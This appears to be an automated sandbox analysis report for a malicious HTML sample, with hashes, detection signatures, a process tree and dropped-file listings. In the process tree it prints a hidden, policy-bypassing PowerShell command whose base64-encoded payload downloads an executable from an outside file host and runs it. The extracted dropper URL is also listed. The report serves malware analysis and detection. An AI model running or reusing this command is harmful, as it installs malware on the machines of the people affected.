Analysis

  • max time kernel
    119s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    07/09/2024, 10:11

General

  • Target

    d1b086a39fe91bba669780c81d29ff24_JaffaCakes118.html

  • Size

    2KB

  • MD5

    d1b086a39fe91bba669780c81d29ff24

  • SHA1

    d5ad755afe37404881f5537a671fcaa8f9317bc3

  • SHA256

    bd77ca243aee922a85817b4200f3ba50b05d80c153f29a8f588d046e6eae0457

  • SHA512

    638c0b48f3c11219476e11639dc1305e279e029c80f446a1f6bb12b0fb5a50a4ea68c64d4e4f0187eb6902868b19387507338cb048b3966746cf2c4b19248697

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://a.pomf.cat/azedfu.exe

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 38 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\d1b086a39fe91bba669780c81d29ff24_JaffaCakes118.html
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2092
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2092 CREDAT:275457 /prefetch:2
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2176
      • C:\Windows\SysWOW64\WINdoWspoWERshell\v1.0\PowERSHELL.EXe
        "C:\Windows\sYstEM32\WINdoWspoWERshell\v1.0\PowERSHELL.EXe" " PoWERSHeLL.Exe -exECuTioNpoLiCy BypASs -nOpRoFilE -windoWSTYlE HIdDEN -EnCOdeDcOmMaND CQAoAE4AZQB3AC0ATwBCAEoAZQBDAHQAIABTAFkAUwB0AGUAbQAuAG4AZQBUAC4AdwBlAGIAYwBMAEkAZQBuAFQAKQAuAEQATwBXAE4ATABPAEEAZABGAEkATABlACgACQAdIGgAdAB0AHAAcwA6AC8ALwBhAC4AcABvAG0AZgAuAGMAYQB0AC8AYQB6AGUAZABmAHUALgBlAHgAZQAdIAkALAAJAB0gJABFAE4AdgA6AGwATwBDAGEAbABBAHAAUABEAGEAVABhAFwAdQB0AHAAdQB0AC4AZQB4AGUAHSAJACkACQA7AAkAUwB0AEEAUgB0AC0AcAByAE8AQwBFAFMAcwAJAB0gJABlAE4AdgA6AGwATwBDAGEATABBAFAAUABkAGEAVABhAFwAdQB0AHAAdQB0AC4AZQB4AGUAHSA= "
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2284
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exECuTioNpoLiCy BypASs -nOpRoFilE -windoWSTYlE HIdDEN -EnCOdeDcOmMaND CQAoAE4AZQB3AC0ATwBCAEoAZQBDAHQAIABTAFkAUwB0AGUAbQAuAG4AZQBUAC4AdwBlAGIAYwBMAEkAZQBuAFQAKQAuAEQATwBXAE4ATABPAEEAZABGAEkATABlACgACQAdIGgAdAB0AHAAcwA6AC8ALwBhAC4AcABvAG0AZgAuAGMAYQB0AC8AYQB6AGUAZABmAHUALgBlAHgAZQAdIAkALAAJAB0gJABFAE4AdgA6AGwATwBDAGEAbABBAHAAUABEAGEAVABhAFwAdQB0AHAAdQB0AC4AZQB4AGUAHSAJACkACQA7AAkAUwB0AEEAUgB0AC0AcAByAE8AQwBFAFMAcwAJAB0gJABlAE4AdgA6AGwATwBDAGEATABBAFAAUABkAGEAVABhAFwAdQB0AHAAdQB0AC4AZQB4AGUAHSA=
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2852

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          4f93159a9fd5df80da480c812bcc6054

          SHA1

          c745a1a7188f6053e32b9a8737901b998f9d151a

          SHA256

          08fffd0a07057cd9e5ce2489ee77e270cec3a272bfe5ba46e39314e7c1b50c76

          SHA512

          c0b9b181e548108c4a3340d1955f9b0d3f498fa9a68c6404e44437938a35838ce9c72721d6c5c252ea969d4efebf1ad3ffa23f7f44a1f9857353c6f257c69c4a

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          edac984c193d621d3fea0052ec18f546

          SHA1

          b3f1911989d8b2e05ec516c1cfe5c35a19339787

          SHA256

          4f4ed0a3b324e70b06ed7f68d1a714d3377c465e673d90d113223580de0fe6a8

          SHA512

          bd68c673913d27b39caca293bf8569cfd9cdf67bdd1aa3c4330f143a19d8b7489f35570e1a8136ed56b07bb17dee3b0bc1234b1c348f041c3b63017de4359769

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          dbb1cc0babd7f998db697372da4ac69c

          SHA1

          f244ced9f40388c0c03674cf08bc2f97b5ac923f

          SHA256

          98af4d587bb153f0b82d13cd2da7d3ce2843c694bc6e67a16ab9b436029f9404

          SHA512

          f6a786f7d462a5c446b3e8edf07db38487fcf0980ae17cf7106d53fca4d4e7c63e2bb1c8fa6b2631cd1532fc626a6c02ace1ee70021d4a3cb8f65615e5f0f379

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          c672494ae89b5523a81980f025f1e032

          SHA1

          579ec6b9914294d28ebe198529298bceb012f841

          SHA256

          482eed912bb8ae317e8a7e3723a1591dcfc87476fe6d0c98be410092744499c0

          SHA512

          ad170a5e45137cd59650070e05e034781319ca1adda4592fca749666676b1a73b87f5de5abb55c009a85411064594f10ff072f8056296f298bbcd1b4e7e607bb

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          55e0d560e144641de0de6a9aed371bb1

          SHA1

          9fa87277fd000f9ddb320822db7112966e3eb7a0

          SHA256

          4525cea7539619379b423b7c2f434ba50380aa92bd3f5f047f31dea0fe733437

          SHA512

          b428fad42fa1ee1167a788b839a103f5987136b4fd4dcd7fafc8a3616b5edf6ab45e1b09bc202193bd53b37ca6a5e510f964b3fc222b7ae862f38d603622badf

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          5609731e704bd363e29dd6e0aaa5cbd5

          SHA1

          9843bc7514eb10c46070c7f658239352ede62e84

          SHA256

          fa1649ae6190137c89d71e57145796a6717a0f7873d24d2044832c14725d6773

          SHA512

          115740b3efcbeb012425cfd91ef40742af236dbeb2e4f7d0f50b0ff201b4a9378c5c59902658c3a7efc3b31eaaf56b82adfa766a27fd3f9db2db9f1b6575c83a

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          771cb6b121fbb3c006a18f8b5feb6fdd

          SHA1

          a0c480c46398ed43fccc99538d3faea265707fd0

          SHA256

          862daa4fe95084946361addeb86d77d7a1ea86884c0b2671e90cb33b19ee43bf

          SHA512

          019f0ee07335992feb4b812a926efb028978c9ef58c5bc2b4f1992b76276314259438c456246ba0ab88b62d038ff763227a552f967c9d78554e81ab0c94bccff

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          11f65a1b7dc577b4276204ca9be4468a

          SHA1

          827bd2fb98d5766bf3dc50a1957cfbb209251db1

          SHA256

          e735fbfa4edf62835e1cf13a96b94408de8219a08bec3b0f8e6c96b1b130c0e6

          SHA512

          670e316bfdab68419e1d3f0a0b8c428db75c068ef2fd4fdb6b08b5ef04af460da40c2f05ac396ba8dee92c8a0647bd9955dca6dfe7a0c5adf041d34df35421a4

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          b2172970821146a43f1f93bc4dd4d4dc

          SHA1

          ced4dc0a763c4cd85089eb4ba805499a375104ab

          SHA256

          de0b76714746e136227eac1afde9f56267eefb84590166e875edb2134233fef3

          SHA512

          57ad27e2fab7718d3989472dd0b845aba8518efe1e7bf4ad90c43d80d4c116abccde9d150ee89f69347ef7e335a4ed834f195b5c82a750263022b8c56e0035e4

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          9b13f1652462676eadeee4a3ec9bb110

          SHA1

          aea85f0f14323177ecd0eb5fb9740f9f00601a24

          SHA256

          a4cae703c1f22699c98239ba44f02a7f90f675ef4176012de61539ed4bfe4242

          SHA512

          c857f0a695d8824a631593925598b9a99454297d9fd7898f4d6db93d583e01e6652ac97daf4eb80dde35008b01cbc43f1ca46f745962077f666b6545e7dc3ab6

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          363e75c3f46669eceabf29eb46b79dd1

          SHA1

          539c6ed1a3ae8ad26cbcbfb54dd68aed14eb1a60

          SHA256

          6ad7a2bca3f6f9ad26426314928f2da064105d9ebf531b54f778586d42823e21

          SHA512

          c930ca73187a1c70de1affd1dda6eb908e068eb5d49d816d028299502419ceb07057ef299ed54b0544824bbff3a211aadfbee08111f089bac21363a7bde63af3

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          97c2f2cfea5e8ae2e3bacde76b7a9710

          SHA1

          5ee3032d7aec058f4db10e2d4805ffa399eab803

          SHA256

          590d0520a05bbd9bace4110820fc2d0787cbd64d40727443d7bd4fd4f50bc246

          SHA512

          1c3ed1db151f2cba173f1d5d74afab95a40d270d747c0d5a9b82de56beb1956ac2b70ff808c91d8ce02a64a2f73a334f569ea9d209e82c1947b9d337687f47e2

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          f04d5e7d195dd200ab54dfee66555a51

          SHA1

          460ed78fd33acabc323e4cfa50a1ddb6f544c6d3

          SHA256

          79cb2175ceb2d8e037854664738c91da844ba79a51ac132b50f1527e704c15f9

          SHA512

          59daa666d28917d03398d205ce5148097c0cea2b8d84e9a304503c2d030d412d94b6eb3efef326f1f7b811294a1ce51cba2e9c52e50be560ea0eec410f194695

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          9ee92935b05b0495b46dfdc0da0a6788

          SHA1

          529982dd1d4427cbf8da61f1d7bfd86228eaac28

          SHA256

          2b7dc70c2078ec070c4b4cedf46353f0933724bd42cfb6ca911f44a04314694f

          SHA512

          e7ff8e1883bb17b8469355e92349532cb0cfe6c114a8b57a4758657c552d6255d965d6308b555a6a4e56e22c94692c918a1ccfbf4ae9a0c71c845578cc49f76e

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          05359b92bd2ae92ba034311bd7c0a032

          SHA1

          56ed6722fb9d5a3f763116307af541ceeb2cdb56

          SHA256

          e86227d857ae2aae7171b32bf0ec100bdfcc2fee2983a888fbb21b6744bb0154

          SHA512

          3018aa9937aa4724ad539260a61bde387a65a5f1be5a721ad418c49db6f9a105b7a4e6165dc714f944d3e709a0605f169653d94e24eb9590fc119f83afe8ff17

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          5c42e4c5e57bc999f23f72f8d1331afa

          SHA1

          725268c14c169e55d9c7d60e7400676eb209e7a1

          SHA256

          ba2233861ae193bb78192f1597fd2dbf544d69f850e3710e9fcc068ef7762f3a

          SHA512

          ea495adb11dae8d87ea231357d0f9e054e78e8df2dd5ff45c5012de8ea9ddf7f08d82d9a681834c4cabd8162c6fa13fecadd4d284a046955259876c849f6c5df

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          5421e572b231a8d654b80d153c6bfe6b

          SHA1

          855eb1e3862c98c4e3acdb1bbc341d2498ffc8ac

          SHA256

          49689554cf64567421922c70782f4f9d492099fa286eb06c4c6864a700c794f6

          SHA512

          79f11e9bb613da2cbf34b3c011dda23f1fb24b062cb27aa65411dc4e48c4c91b8e6a6477bbe6bf58c8aa722a3dfbb0964d7b3293a746eb3f5d6292878a7d8c0d

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          a556f91f7ff411c8f955a71bd2427fff

          SHA1

          79d314d5be9f9fe1483858aa3168133700f72a94

          SHA256

          2dfaa2d08b17137d92bc08ac9b5d2d438fca57d73bbb21a189ee5bfa98a68c13

          SHA512

          1339e97ff9ea132738b284315e7f15bcaebf1c76907931efb9c4e24e2c69e953dff45002c9e9aec2d82691eb8727082ae78083c08b29dcf3afa50217ad9ee895

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          98d329e7b5faca4111868d4bc722c4d5

          SHA1

          11331cd9174d07836cd1f323751d62c6490ffdc6

          SHA256

          7c372dd6dbf54e6fb9bf611b66289a54f356dbfb70f71668ec5c11ca0aa6206d

          SHA512

          d2d6442d18fa78f31ec736eb0b13cf5d26e4d746c7aeef8623bab1109ee7e5e8ba7c651129c1b27cfdc94b9d5bf06928137d84a41f180d87731411ff98a6a4fe

        • C:\Users\Admin\AppData\Local\Temp\CabC90C.tmp

          Filesize

          70KB

          MD5

          49aebf8cbd62d92ac215b2923fb1b9f5

          SHA1

          1723be06719828dda65ad804298d0431f6aff976

          SHA256

          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

          SHA512

          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        • C:\Users\Admin\AppData\Local\Temp\TarC9BB.tmp

          Filesize

          181KB

          MD5

          4ea6026cf93ec6338144661bf1202cd1

          SHA1

          a1dec9044f750ad887935a01430bf49322fbdcb7

          SHA256

          8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

          SHA512

          6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

          Filesize

          7KB

          MD5

          ec42b4bdecafd259758b52ebb7c70773

          SHA1

          ff716a1b22e53357cd6527c3a04e39963b21acf6

          SHA256

          21b90e76f61a01b2bbfa9216f2acf58ab5d263bc133c684c2d372688fc954e46

          SHA512

          196c6417e7e1681c8f92200baf82c9c6c357eef122d61cd7589bdb66ce97843d78e6209b459521360e5f4893286e7e1b35c8cdabd0617978ed0d06f7a9736c28

        • memory/2284-4-0x0000000070F30000-0x00000000714DB000-memory.dmp

          Filesize

          5.7MB

        • memory/2284-3-0x0000000070F30000-0x00000000714DB000-memory.dmp

          Filesize

          5.7MB

        • memory/2284-2-0x0000000070F31000-0x0000000070F32000-memory.dmp

          Filesize

          4KB

        • memory/2284-5-0x0000000070F30000-0x00000000714DB000-memory.dmp

          Filesize

          5.7MB

        • memory/2284-6-0x0000000070F30000-0x00000000714DB000-memory.dmp

          Filesize

          5.7MB

        • memory/2284-13-0x0000000070F30000-0x00000000714DB000-memory.dmp

          Filesize

          5.7MB

        • memory/2284-20-0x0000000070F30000-0x00000000714DB000-memory.dmp

          Filesize

          5.7MB

        • memory/2852-12-0x0000000070F30000-0x00000000714DB000-memory.dmp

          Filesize

          5.7MB

        • memory/2852-19-0x0000000070F30000-0x00000000714DB000-memory.dmp

          Filesize

          5.7MB